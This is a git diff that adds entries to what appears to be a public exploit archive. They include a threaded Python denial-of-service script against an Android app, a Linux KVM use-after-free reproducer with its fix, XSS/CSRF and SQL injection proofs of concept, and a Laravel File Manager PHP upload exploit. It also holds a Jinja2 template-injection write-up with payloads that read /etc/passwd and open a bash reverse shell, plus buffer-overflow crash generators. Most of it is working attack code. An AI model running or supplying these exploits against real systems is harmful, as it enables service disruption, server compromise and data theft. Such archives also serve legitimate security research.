diff --git a/exploits/android/dos/46381.py b/exploits/android/dos/46381.py new file mode 100755 index 000000000..91e13ca36 --- /dev/null +++ b/exploits/android/dos/46381.py @@ -0,0 +1,49 @@ +#!/usr/bin/python +#coding: utf-8 + +# ************************************************************************ +# * Author: Marcelo Vázquez (aka s4vitar) * +# * AirMore 1.6.1 Remote Denial of Service (DoS) & System Freeze * +# ************************************************************************ + +# Exploit Title: AirMore 1.6.1 Remote Denial of Service (DoS) & System Freeze +# Date: 2019-02-14 +# Exploit Author: Marcelo Vázquez (aka s4vitar) +# Vendor Homepage: https://airmore.com/ +# Software Link: https://airmore.com/download +# Version: <= AirMore 1.6.1 +# Tested on: Android + +import sys, requests, threading, signal + +def handler(signum, frame): + print '\nFinishing program...\n' + sys.exit(0) + +if len(sys.argv) != 3: + print "\nUsage: python " + sys.argv[0] + " \n" + print "Example: python AirMore_dos.py 192.168.1.125 2333\n" + sys.exit(0) + +def startAttack(url): + url_destination = url + '/?Key=PhoneRequestAuthorization' + headers = {'Origin': url, 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'es-ES,es;q=0.9,en;q=0.8', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36', 'Content-Type': 'text/plain;charset=UTF-8', 'accept': 'text/plain', 'Referer': url, 'Connection': 'keep-alive'} + + r = requests.post(url_destination, headers=headers) + +if __name__ == '__main__': + + signal.signal(signal.SIGINT, handler) + url = 'http://' + sys.argv[1] + ':' + sys.argv[2] + + threads = [] + + for i in xrange(0, 10000): + t = threading.Thread(target=startAttack, args=(url,)) + threads.append(t) + + for x in threads: + x.start() + + for x in threads: + x.join() \ No newline at end of file diff --git a/exploits/linux/dos/46388.txt b/exploits/linux/dos/46388.txt new file mode 100644 index 000000000..bce7dac71 --- /dev/null +++ b/exploits/linux/dos/46388.txt @@ -0,0 +1,288 @@ +kvm_ioctl_create_device() contains the following code: + + dev = kzalloc(sizeof(*dev), GFP_KERNEL); + if (!dev) + return -ENOMEM; + + dev->ops = ops; + dev->kvm = kvm; + + mutex_lock(&kvm->lock); + ret = ops->create(dev, cd->type); + if (ret < 0) { + mutex_unlock(&kvm->lock); + kfree(dev); + return ret; + } + list_add(&dev->vm_node, &kvm->devices); + mutex_unlock(&kvm->lock); + + if (ops->init) + ops->init(dev); + + ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC); + if (ret < 0) { + mutex_lock(&kvm->lock); + list_del(&dev->vm_node); + mutex_unlock(&kvm->lock); + ops->destroy(dev); + return ret; + } + + kvm_get_kvm(kvm); + cd->fd = ret; + +This code: + +1. creates a device that holds a reference to the VM object (with a borrowed + reference, the VM's refcount has not been bumped yet) +2. initializes the device +3. transfers the reference to the device to the caller's file descriptor table +4. calls kvm_get_kvm() to turn the borrowed reference to the VM into a real + reference + +The ownership transfer in step 3 must not happen before the reference to the VM +becomes a proper, non-borrowed reference, which only happens in step 4. +After step 3, an attacker can close the file descriptor and drop the borrowed +reference, which can cause the refcount of the kvm object to drop to zero. + +Reproducer code: + +================================= +// run as `gcc -o kvm_fd_install kvm_fd_install.c -Wall -pthread && ./kvm_fd_install` +#include +#include +#include +#include +#include +#include +#include + +static int predicted_fd = -1; +static volatile int ready = 0; + +static void *do_close_predicted_fd(void *dummy) { + ready = 1; + while (1) close(predicted_fd); + return NULL; /*unreachable*/ +} + +int main(void) { + int kvm = open("/dev/kvm", O_RDWR); + if (kvm == -1) err(1, "open kvm"); + int vm = ioctl(kvm, KVM_CREATE_VM, 0); + if (vm < 0) err(1, "KVM_CREATE_VM"); + + predicted_fd = dup(0); + if (predicted_fd == -1) err(1, "dup"); + close(predicted_fd); + + pthread_t thread; + if (pthread_create(&thread, NULL, do_close_predicted_fd, NULL)) errx(1, "pthread_create"); + while (ready == 0) /*spin*/; + + struct kvm_create_device cd = { + .type = KVM_DEV_TYPE_VFIO, + .fd = -1, //outparm + .flags = 0 + }; + if (ioctl(vm, KVM_CREATE_DEVICE, &cd)) err(1, "KVM_CREATE_DEVICE"); + printf("created device: %d\n", cd.fd); +} +================================= + +To reliably reproduce the issue, patch the kernel as follows to widen the race: +================================= +diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c +index 5ecea812cb6a..d43677044ec0 100644 +--- a/virt/kvm/kvm_main.c ++++ b/virt/kvm/kvm_main.c +@@ -51,6 +51,7 @@ + #include + #include + #include ++#include + + #include + #include +@@ -2970,6 +2971,8 @@ static int kvm_ioctl_create_device(struct kvm *kvm, + bool test = cd->flags & KVM_CREATE_DEVICE_TEST; + int ret; + ++ pr_warn("kvm_ioctl_create_device: entry: refcount=%u\n", refcount_read(&kvm->users_count)); ++ + if (cd->type >= ARRAY_SIZE(kvm_device_ops_table)) + return -ENODEV; + +@@ -3000,6 +3003,8 @@ static int kvm_ioctl_create_device(struct kvm *kvm, + if (ops->init) + ops->init(dev); + ++ pr_warn("kvm_ioctl_create_device: before anon_inode_getfd: refcount=%u\n", refcount_read(&kvm->users_count)); ++ + ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC); + if (ret < 0) { + mutex_lock(&kvm->lock); +@@ -3009,8 +3014,13 @@ static int kvm_ioctl_create_device(struct kvm *kvm, + return ret; + } + ++ pr_warn("kvm_ioctl_create_device: after anon_inode_getfd: refcount=%u\n", refcount_read(&kvm->users_count)); ++ msleep(100); ++ pr_warn("kvm_ioctl_create_device: after sleeping: refcount=%u\n", refcount_read(&kvm->users_count)); ++ + kvm_get_kvm(kvm); + cd->fd = ret; ++ pr_warn("kvm_ioctl_create_device: exiting: refcount=%u\n", refcount_read(&kvm->users_count)); + return 0; + } +================================= + +splat in a patched kernel: +================================= +[ 224.536858] kvm_ioctl_create_device: entry: refcount=1 +[ 224.539410] kvm_ioctl_create_device: before anon_inode_getfd: refcount=1 +[ 224.541542] kvm_ioctl_create_device: after anon_inode_getfd: refcount=1 +[ 224.651860] BUG: unable to handle kernel paging request at ffffc900015deb08 +[ 224.653744] #PF error: [normal kernel read fault] +[ 224.655032] PGD 1ead35067 P4D 1ead35067 PUD 1eaeb6067 PMD 1e2c46067 PTE 0 +[ 224.656834] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN +[ 224.658364] CPU: 0 PID: 1155 Comm: kvm_fd_install Not tainted 5.0.0-rc3+ #251 +[ 224.660252] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 +[ 224.662551] RIP: 0010:kvm_vm_ioctl+0xd75/0xdd0 +[ 224.663746] Code: c7 c7 a0 f3 a0 a8 e8 53 fa 21 00 bf 64 00 00 00 e8 a0 e5 24 00 be 04 00 00 00 4c 89 ef e8 03 ba 42 00 4c 89 ef e8 cb d8 42 00 <8b> b5 08 9b 00 00 48 c7 c7 00 f4 a0 a8 e8 22 fa 21 00 48 89 ef e8 +[ 224.668662] RSP: 0018:ffff8881e3c3f988 EFLAGS: 00010246 +[ 224.670057] RAX: 0000000000000000 RBX: 1ffff1103c787f36 RCX: ffffffffa6a2c325 +[ 224.671950] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffffc900015deb08 +[ 224.673835] RBP: ffffc900015d5000 R08: fffff520002bbd62 R09: fffff520002bbd62 +[ 224.675731] R10: 0000000000000001 R11: fffff520002bbd61 R12: ffff8881d65863e0 +[ 224.677615] R13: ffffc900015deb08 R14: ffff8881d65863c8 R15: ffffffffa9653bc0 +[ 224.679506] FS: 00007f11f9500700(0000) GS:ffff8881eb000000(0000) knlGS:0000000000000000 +[ 224.681643] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 +[ 224.684886] CR2: ffffc900015deb08 CR3: 00000001dfc20003 CR4: 00000000003606f0 +[ 224.686788] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 +[ 224.688674] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 +[ 224.690565] Call Trace: +[...] +[ 224.721351] do_vfs_ioctl+0x134/0x8f0 +[...] +[ 224.732860] ksys_ioctl+0x70/0x80 +[ 224.733749] __x64_sys_ioctl+0x3d/0x50 +[ 224.734764] do_syscall_64+0x73/0x160 +[ 224.735743] entry_SYSCALL_64_after_hwframe+0x44/0xa9 +[ 224.737092] RIP: 0033:0x7f11f8e21dd7 +[ 224.738048] Code: 00 00 00 48 8b 05 c1 80 2b 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 91 80 2b 00 f7 d8 64 89 01 48 +[ 224.742945] RSP: 002b:00007ffeb6611e58 EFLAGS: 00000202 ORIG_RAX: 0000000000000010 +[ 224.744932] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f11f8e21dd7 +[ 224.746810] RDX: 00007ffeb6611e64 RSI: 00000000c00caee0 RDI: 0000000000000004 +[ 224.748681] RBP: 00007ffeb6611e80 R08: 00007f11f8d40700 R09: 00007f11f8d40700 +[ 224.750556] R10: 00007f11f8d409d0 R11: 0000000000000202 R12: 0000564cddd8a7b0 +[ 224.752433] R13: 00007ffeb6611f60 R14: 0000000000000000 R15: 0000000000000000 +[ 224.754311] Modules linked in: btrfs xor zstd_compress raid6_pq +[ 224.755904] CR2: ffffc900015deb08 +[ 224.756792] ---[ end trace 670d8a6b1c3ab210 ]--- +================================= + +Without the patch, I can still crash a Debian stable distro kernel by running +the reproducer in a loop (`while true; do ./kvm_fd_install; done`), but it takes +a while to trigger: +================================= +[ 251.054762] BUG: unable to handle kernel NULL pointer dereference at 00000000000000a8 +[ 251.057734] IP: [] down_write+0x1b/0x40 +[ 251.059903] PGD 0 + +[ 251.061455] Oops: 0002 [#1] SMP +[ 251.062661] Modules linked in: ipt_MASQUERADE nf_nat_masquerade_ipv4 nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 xt_addrtype iptable_filter xt_conntrack nf_nat nf_conntrack br_netfilter bridge stp llc aufs(O) overlay snd_hda_codec_generic kvm_intel snd_hda_intel qxl kvm ttm irqbypass crct10dif_pclmul crc32_pclmul ghash_clmulni_intel drm_kms_helper snd_hda_codec snd_hda_core joydev virtio_balloon snd_hwdep evdev sg snd_pcm 9pnet_virtio serio_raw snd_timer snd button virtio_console binfmt_misc soundcore pcspkr drm 9p 9pnet fscache ip_tables x_tables autofs4 ext4 crc16 jbd2 fscrypto ecb mbcache btrfs crc32c_generic xor hid_generic usbhid hid raid6_pq sr_mod cdrom ata_generic virtio_blk virtio_net crc32c_intel ata_piix aesni_intel uhci_hcd +[ 251.085764] ehci_pci aes_x86_64 ehci_hcd glue_helper libata lrw gf128mul ablk_helper psmouse i2c_piix4 cryptd virtio_pci usbcore virtio_ring usb_common scsi_mod virtio floppy +[ 251.090094] CPU: 4 PID: 6392 Comm: kvm_fd_install Tainted: G O 4.9.0-8-amd64 #1 Debian 4.9.130-2 +[ 251.092751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 +[ 251.094947] task: ffff949b676f10c0 task.stack: ffffb79691840000 +[ 251.096524] RIP: 0010:[] [] down_write+0x1b/0x40 +[ 251.098605] RSP: 0018:ffffb79691843bf0 EFLAGS: 00010246 +[ 251.100029] RAX: 00000000000000a8 RBX: 00000000000000a8 RCX: ffffb79691843c28 +[ 251.101904] RDX: ffffffff00000001 RSI: 0000000000000286 RDI: 00000000000000a8 +[ 251.103786] RBP: ffff949b4650b1d8 R08: 0000000000000000 R09: 0000000000000000 +[ 251.105659] R10: ffff949b66a84510 R11: ffffdb9787f9bf80 R12: ffff949b4650b220 +[ 251.107556] R13: ffff949b4650b180 R14: ffffffff96310034 R15: ffff949b4650b180 +[ 251.109423] FS: 0000000000000000(0000) GS:ffff949b73d00000(0000) knlGS:0000000000000000 +[ 251.111560] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 +[ 251.113081] CR2: 00000000000000a8 CR3: 00000001cf808000 CR4: 0000000000360670 +[ 251.114956] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 +[ 251.116847] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 +[ 251.118718] Stack: +[ 251.119277] ffff949b67cc0000 ffffffff956933f1 ffffb79691843c00 ffff949b67cc0000 +[ 251.122232] ffff949b67cc0000 ffff949b69ce4b68 ffff949b6a624060 ffff949b693cd740 +[ 251.124294] ffff949b69ce4b68 ffffffffc07410b2 ffff949b67cc0000 0000000000000008 +[ 251.126345] Call Trace: +[ 251.127015] [] ? debugfs_remove_recursive+0x51/0x1c0 +[ 251.128780] [] ? kvm_put_kvm+0x32/0x1d0 [kvm] +[ 251.130366] [] ? kvm_vm_release+0x1d/0x30 [kvm] +[ 251.132000] [] ? __fput+0xd8/0x220 +[ 251.133327] [] ? task_work_run+0x7f/0xa0 +[ 251.134790] [] ? do_exit+0x2d5/0xaf0 +[ 251.136163] [] ? do_group_exit+0x3a/0xa0 +[ 251.137618] [] ? get_signal+0x299/0x640 +[ 251.139056] [] ? do_signal+0x36/0x6a0 +[ 251.140458] [] ? kvm_arch_hardware_disable+0x15/0x40 [kvm] +[ 251.142324] [] ? __fput+0x17d/0x220 +[ 251.143687] [] ? task_work_run+0x84/0xa0 +[ 251.145156] [] ? exit_to_usermode_loop+0x71/0xb0 +[ 251.146794] [] ? do_syscall_64+0xdd/0xf0 +[ 251.148261] [] ? entry_SYSCALL_64_after_swapgs+0x58/0xc6 +[ 251.150074] Code: 01 74 08 48 c7 43 20 01 00 00 00 5b c3 0f 1f 00 0f 1f 44 00 00 53 48 89 fb e8 b2 df ff ff 48 ba 01 00 00 00 ff ff ff ff 48 89 d8 48 0f c1 10 85 d2 74 05 e8 17 be d2 ff 65 48 8b 04 25 c0 fb +[ 251.157011] RIP [] down_write+0x1b/0x40 +[ 251.158480] RSP +[ 251.159418] CR2: 00000000000000a8 +[ 251.160300] ---[ end trace b3803036d037ea83 ]--- +[ 251.161513] Fixing recursive fault but reboot is needed! +================================= + +I have requested a CVE identifier from MITRE, but haven't heard back yet. + +I am attaching a suggested patch; here's an inline copy for review (with +clobbered whitespace): + +=========================================== +From 7396c501baf3f066c05a74c790775c2c686be8a7 Mon Sep 17 00:00:00 2001 +From: Jann Horn +Date: Sat, 26 Jan 2019 01:19:40 +0100 +Subject: [PATCH] kvm: fix temporary refcount drop in kvm_ioctl_create_device() + +As soon as we call anon_inode_getfd(), userspace can close the device, +causing a kvm_put_kvm() call that drops a reference. This means that we +need to grab a reference for the device before anon_inode_getfd(), +otherwise the VM can disappear from under us. + +Fixes: 852b6d57dc7f ("kvm: add device control API") +Cc: stable@kernel.org +Signed-off-by: Jann Horn +--- + virt/kvm/kvm_main.c | 3 ++- + 1 file changed, 2 insertions(+), 1 deletion(-) + +diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c +index 5ecea812cb6a..585845203db8 100644 +--- a/virt/kvm/kvm_main.c ++++ b/virt/kvm/kvm_main.c +@@ -3000,8 +3000,10 @@ static int kvm_ioctl_create_device(struct kvm *kvm, + if (ops->init) + ops->init(dev); + ++ kvm_get_kvm(kvm); + ret = anon_inode_getfd(ops->name, &kvm_device_fops, dev, O_RDWR | O_CLOEXEC); + if (ret < 0) { ++ kvm_put_kvm(kvm); + mutex_lock(&kvm->lock); + list_del(&dev->vm_node); + mutex_unlock(&kvm->lock); +@@ -3009,7 +3011,6 @@ static int kvm_ioctl_create_device(struct kvm *kvm, + return ret; + } + +- kvm_get_kvm(kvm); + cd->fd = ret; + return 0; + } +-- +2.20.1.495.gaa96b0ce6b-goog +=========================================== \ No newline at end of file diff --git a/exploits/php/webapps/46384.txt b/exploits/php/webapps/46384.txt new file mode 100644 index 000000000..bd73cab27 --- /dev/null +++ b/exploits/php/webapps/46384.txt @@ -0,0 +1,42 @@ +# Exploit Title: MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / CSRF +# Date: 7/17/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=957 +# Version: 1.1.3 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-14575 + + +1. Description: +Creates a trash bin in the ACP where you can recover permanent deleted threads and posts. The thread/post subjects allow XSS and deleted posts can be restored by CSRF. + + +2. Proof of Concept: + +Cross-Site Scripting + +- Create a new thread with the following subject +- Permanently delete that thread +- Alert is located in threads trash bin localhost/[path]/admin/index.php?module=tools-trashbin and localhost/admin/index.php?module=tools-trashbin&action=posts + +- Reply to a post and change the subject to the following +- Permanently delete that post +- Alert is located in posts trash bin localhost/[path]/admin/index.php?module=tools-trashbin&action=posts + + +Cross-Site Request Forgery + + + + +
Restore
+ + + + +3. Solution: +Update to 1.1.4 \ No newline at end of file diff --git a/exploits/php/webapps/46387.txt b/exploits/php/webapps/46387.txt new file mode 100644 index 000000000..a33431efd --- /dev/null +++ b/exploits/php/webapps/46387.txt @@ -0,0 +1,36 @@ +=========================================================================================== +# Exploit Title: qdPM 9.1 - 'search_by_extrafields[]' SQL Injection +# Date: 14-02-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: http://qdpm.net +# Software Link: http://qdpm.net/download-qdpm-free-project-management +# Version: v9.1 +# Category: Webapps +# Tested on: Wamp64, @Win +# Software description: + Free project management tool for small team + qdPM is a free web-based project management tool suitable for a +small team working on multiple projects. + It is fully configurable. You can easy manage Projects, Tasks and +People. Customers interact + using a Ticket System that is integrated into Task management. +=========================================================================================== +# POC - SQLi +# Parameters : search_by_extrafields[] +# Attack Pattern : URL encoded POST input search_by_extrafields[] was set to \ + Error message found : You have an error in your SQL syntax +# POST Request: http://localhost/qdpm/index.php/users +=========================================================================================== +POST /qdpm/index.php/users HTTP/1.1 +Content-Length: 45 +Content-Type: application/x-www-form-urlencoded +Referer: http://localhost/qdPM/ +Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1 +Host: localhost +Connection: Keep-alive +Accept-Encoding: gzip,deflate +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 +(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 +Accept: */* + +search[keywords]=&search_by_extrafields[]=%5c \ No newline at end of file diff --git a/exploits/php/webapps/46389.py b/exploits/php/webapps/46389.py new file mode 100755 index 000000000..a8589ae27 --- /dev/null +++ b/exploits/php/webapps/46389.py @@ -0,0 +1,88 @@ +### Exploit Title: UniSharp Laravel File Manager - Arbitrary File Upload +## +## Google Dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io +## Exploit Author: Mohammad Danish +## Vendor Homepage: https://github.com/UniSharp/laravel-filemanager +## Software Link: https://github.com/UniSharp/laravel-filemanager +## Version: v2.0.0-alpha7 & v.2.0 +## +## Exploit: UniSharp Laravel File Manager - Arbitrary File Upload +## Reference: https://github.com/UniSharp/laravel-filemanager/issues/356 +## +## +## Issue Description: +## Larvel File Manager by UniSharp allows Arbitrary File Upload if type is set to Files /laravel-filemanager?type=Files +## +##********************* +##IMPORTANT READ +##********************* +## Code is not good written, as I just started learning python +## +##********************** +## [!!] USAGE: exploit.py +## [!!] USAGE: exploit.py 192.168.100.12 8080 eyJpdiI6IlplemdVaG9FSm9MaXJobEgrYlwvSkhnPT0iLCJ2YWx1ZSI6IkhrZ2R1O.......... +##----------------------- +## + + +import socket +import sys + +def exploit(host,port,sessionId): + + req = "" + req += "POST /laravel-filemanager/upload HTTP/1.1\r\n" + req += "Host: "+host+":"+port+"\r\n" + req += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0\r\n" + req += "Accept: */*\r\n" + req += "Accept-Language: en-US,en;q=0.5\r\n" + req += "Accept-Encoding: gzip, deflate\r\n" + req += "X-Requested-With: XMLHttpRequest\r\n" + req += "Referer: http://"+host+":"+port+"/laravel-filemanager?type=Files\r\n" + req += "Content-Length: 527\r\n" + req += "Content-Type: multipart/form-data; boundary=---------------------------12194679330849\r\n" + req += "Cookie:laravel_session="+sessionId+"\r\n" + req += "Connection: keep-alive\r\n" + req += "\r\n" + req += "\r\n" + + req += "-----------------------------260082409123824\r\n" + req += 'Content-Disposition: form-data; name="upload[]"; filename="c0w.php"\r\n' + req += 'Content-Type: text/plain\r\n\r\n' + + req += 'Happy Hacking!!\r\n' + req += "\r\n" + req += "-------------------\r\n" + req += "-----------------------------260082409123824\r\n" + req += 'Content-Disposition: form-data; name="working_dir"\r\n' + req += "/1\r\n" + req += "-----------------------------260082409123824\r\n" + req += 'Content-Disposition: form-data; name="type"\r\n' + + req += "Files\r\n" + req += "-----------------------------260082409123824\r\n" + req += 'Content-Disposition: form-data; name="_token"\r\n' + + req += "MU5XhVxbrkRnkVJFUHCjdfNSVTKm3qro6OgtWXjy\r\n" + req += "-----------------------------260082409123824--\r\n" + + s = socket.socket() + int_port = int(port) + s.connect((host,int_port)) +## print req + s.send(req) + response = s.recv(1024) + magic = response[-10:] + if "OK" in magic: + print "[!] Your shell Uploaded successfully to directory /1/c0w.php" + else: + print "[!] Either the server is not vulnerable OR \r\n1) Check your laravel_session cookie \r\n2) Change working_dir in this exploit \r\n3) Check _token" + + + +host = sys.argv[1] +port = sys.argv[2] +sessionId = sys.argv[3] +exploit(host,port,sessionId) \ No newline at end of file diff --git a/exploits/python/webapps/46386.py b/exploits/python/webapps/46386.py new file mode 100755 index 000000000..3cd3b0dac --- /dev/null +++ b/exploits/python/webapps/46386.py @@ -0,0 +1,50 @@ +''' +# Exploit Title: Jinja2 Command injection from_string function +# Date: [date] +# Exploit Author: JameelNabbo +# Website: Ordina.nl +# Vendor Homepage: http://jinja.pocoo.org +# Software Link: https://pypi.org/project/Jinja2/#files +# Version: 2.10 +# Tested on: Kali Linux +# CVE-2019-8341 + + +// from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it. + + +//here's an example about the vulnerable code that uses from_string function in order to handle a variable in GET called 'username' and returns Hello {username}: +''' + +import Flask +import request +import Jinja2 + + +@app.route("/") +def index(): + username = request.values.get('username') + return Jinja2.from_string('Hello ' + username).render() + + +if __name__ == "__main__": + app.run(host='127.0.0.1' , port=4444) + +''' +POC +//Exploiting the username param +http://localhost:4444/?username={{4*4}} +OUTPUT: Hello 16 + +Reading the /etc/passwd + +http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} + + +Getting a reverse shell +http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} + + +How to prevent it: +Never let the user provide template content. +''' \ No newline at end of file diff --git a/exploits/windows/dos/46382.py b/exploits/windows/dos/46382.py new file mode 100755 index 000000000..5aaeafb64 --- /dev/null +++ b/exploits/windows/dos/46382.py @@ -0,0 +1,22 @@ +#Exploit Title: Free IP Switcher 3.1 - Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2018-02-14 +#Vendor Homepage: http://www.eusing.com/index.html +#Software Link: http://www.eusing.com/ipscan/free_ip_scanner.htm +#Tested Version: 3.1 +#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1 + +#Steps to produce the crash: +#1.- Run python code: Free_IP_Switcher_3.1.py +#2.- Open bd.txt and copy content to clipboard +#2.- Open Free IP Switcher +#3.- Select "Network Adapter" +#4.- In "Additional" enable "Computer Name" and Paste ClipBoard +#5.- Click on "Activate" +#6.- Crashed + +cod = "\x41" * 240 + +f = open('ip_code.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46383.py b/exploits/windows/dos/46383.py new file mode 100755 index 000000000..f30d7a20f --- /dev/null +++ b/exploits/windows/dos/46383.py @@ -0,0 +1,29 @@ +#Exploit Title: Navicat for Oracle 12.1.15 - "Password" Denial of Service (PoC) +#Discovery by: Victor Mondragón +#Discovery Date: 2019-02-14 +#Vendor Homepage: https://www.navicat.com/es/ +#Software Link: https://www.navicat.com/es/download/navicat-for-oracle +#Tested Version: 12.1.15 +#Tested on: Windows 10 Single Language x64/ Windows 7 x64 Service Pack 1 + +#Steps to produce the crash: +#1.- Run python code: Navicat_for_Oracle_12.1.15.py +#2.- Open code.txt and copy content to clipboard +#2.- Open Navicat for Oracle 12.1.15 +#3.- Select "Conexión" +#4.- Select "Oracle" +#5.- In "Nombre de conexión" type "Test" +#6.- In "Tipo de conexión" select "Basic" +#7.- In "Host" type 1.1.1.1 +#8.- In "Puerto" type "1521" +#9.- In "Nombre del servicio" type ORCL +#10.- In "Nombre de usuario" type "user" +#11.- In "Contraseña" Paste Clipboard +#12.- Select "Aceptar" +#13.- Crashed + +cod = "\x41" * 550 + +f = open('string.txt', 'w') +f.write(cod) +f.close() \ No newline at end of file diff --git a/exploits/windows/dos/46385.py b/exploits/windows/dos/46385.py new file mode 100755 index 000000000..00f486907 --- /dev/null +++ b/exploits/windows/dos/46385.py @@ -0,0 +1,26 @@ +# Exploit Title: VSCO 1.1.1.0 - Denial of Service (PoC) +# Date: 2/14/2018 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://www.microsoft.com/store/productId/9NC1RLNH76PB +# Version: 1.1.1.0 +# Tested on: Windows 10 + +# Proof of Concept: +# Run the python script, it will create a new file "PoC.txt" +# Copy the text from the generated PoC.txt file to clipboard +# Paste the text in the top right search bar and hit Search +# Click back to Home +# App will now crash + +buffer = "A" * 5000 +payload = buffer +try: + f=open("PoC.txt","w") + print "[+] Creating %s evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: +print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 65deb8a42..9d079c978 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6309,7 +6309,12 @@ id,file,description,date,author,type,platform,port 46367,exploits/windows/dos/46367.py,"NetworkSleuth 3.0 - 'Name' Denial of Service (PoC)",2019-02-13,"Alejandra Sánchez",dos,windows, 46371,exploits/windows/dos/46371.py,"Core FTP/SFTP Server 1.2 Build 589.42 - 'User domain' Denial of Service (PoC)",2019-02-14,"Victor Mondragón",dos,windows, 46378,exploits/windows/dos/46378.py,"MediaMonkey 4.1.23 - '.mp3' URL Denial of Service (PoC)",2019-02-14,"Alejandra Sánchez",dos,windows, -46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS)",2019-02-14,s4vitar,dos,android, +46380,exploits/android/dos/46380.py,"ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)",2019-02-14,s4vitar,dos,android, +46381,exploits/android/dos/46381.py,"AirMore 1.6.1 - Denial of Service (PoC)",2019-02-15,s4vitar,dos,android, +46382,exploits/windows/dos/46382.py,"Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC)",2019-02-15,"Victor Mondragón",dos,windows, +46383,exploits/windows/dos/46383.py,"Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC)",2019-02-15,"Victor Mondragón",dos,windows, +46385,exploits/windows/dos/46385.py,"VSCO 1.1.1.0 - Denial of Service (PoC)",2019-02-15,0xB9,dos,windows, +46388,exploits/linux/dos/46388.txt,"Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference",2019-02-15,"Google Security Research",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -40586,7 +40591,7 @@ id,file,description,date,author,type,platform,port 45840,exploits/php/webapps/45840.txt,"Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload",2018-11-13,"Ihsan Sencan",webapps,php,80 45841,exploits/php/webapps/45841.txt,"Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download",2018-11-13,"Ihsan Sencan",webapps,php,80 45842,exploits/php/webapps/45842.txt,"Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80 -45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - 'order' SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 45844,exploits/php/webapps/45844.txt,"SIPve 0.0.2-R19 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 45845,exploits/php/webapps/45845.txt,"iServiceOnline 1.0 - 'r' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80 45847,exploits/php/webapps/45847.txt,"Helpdezk 1.1.1 - 'query' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80 @@ -40842,3 +40847,7 @@ id,file,description,date,author,type,platform,port 46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80 46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL 